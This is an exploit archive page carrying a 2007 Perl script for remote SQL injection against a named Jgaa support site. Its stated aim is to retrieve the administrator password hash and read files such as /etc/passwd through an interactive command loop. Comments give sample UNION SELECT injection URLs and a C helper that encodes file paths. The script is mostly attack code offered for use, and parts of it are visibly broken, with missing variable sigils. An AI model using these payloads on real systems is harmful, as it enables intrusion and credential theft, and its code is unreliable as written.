exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

jgaa-sql.txt

jgaa-sql.txt
Posted Jul 25, 2007
Authored by fl0 fl0w

jgaa remote SQL injection exploit that allows administrator password hash retrieval.

tags | exploit, remote, sql injection
SHA-256 | 1f985808327542ceaf40c4201340e279d95406ff802e793817633815898a85db

jgaa-sql.txt

Change Mirror Download
#!/usr/bin/perl
#You can get admin hash,or acces the pass file from the *NIx
#with the generated strings with the generator.c program
#you have to put in sql specific comands,my example is for
#tables and *NIX pass
#exploit tested on winxp sp2
# #include<stdio.h>

# #include<stdlib.h>

# #include<string.h>

# int main()

# { char st[1024];
# int le;
# printf("Input : ");
# gets(st);
# for(le=0;le<strlen(st);le++)

# { printf("%d,",st[le]);
# }
# system("pause");

# return 0;
# }

#101,116,99,47,112,97,115,115,119,100 = /etc/passwd

#If we would do this :
#http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*
#we create 8 tables ,to see the result type :
#-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*

print "......Start.......\n";
print ".................\n";
print ". fl0 fl0w .\n";
print ". found by fl0w fl0w\n";
print ". c0ded by fl0 fl0w\n";
print ".......Email me at flo[underscore]fl0w[underscore]supremacy[dot]com\n\n";
print ".................\n\n";

use LWP::UserAgent;

$site=@ARGV[0];

$shells=@ARGV[1];
$shellcmd=@ARGV[2];

if($site!~/http:\/\// || $site!~/http:\/\// || !$shells)

{ routine()
}

header();

while() { print"[shell] \$";
while(<STDIN>)
{ $cmd=$_;

chomp($cmd);
$sploit=LWP::UserAgent->new() or die;
$requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n";
$re=$sploit->request(requesting);

$i=$re->content;
$i=~tr/[\n]/[ê]/;
if(!$cmd) { print "Enter a command\n\n";
$i="";
}


elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in <b>/ )

{ print "\nCould NOT connect to cmd from host \n";
exit;
}
elsif($i=~/^<br.\/>.<b>WARNING/) {
print "\nInvalid command\n\n";

};
if($i=~/(.+)<br.\/>.<b>WARNING.(.+)<br.\/>.<b>WARNING/)
{ $last=$1;
$last=~tr/[&234;]/[\n]/;
print "\n$last\n";
last;
}


else {
print "[shell] \$";
}
}
}
last;

sub header()
{ print q {

================================================================================================================================================================
MSQL injection -file disclosure in Jgaa's Internet
PoC:http://support.jgaa.com
Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*
================================================================================================================================================================
}

}
sub routine()
{ header();
print q {
======================================================================================================
USAGE: perl exploit.pl <http://site.com>
EXAMPLE: perl [localhost\][path] exploit.pl [target]
======================================================================================================
};

exit();

}





---------------------------------
Yahoo! oneSearch: Finally, mobile search that gives answers, not web links.
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close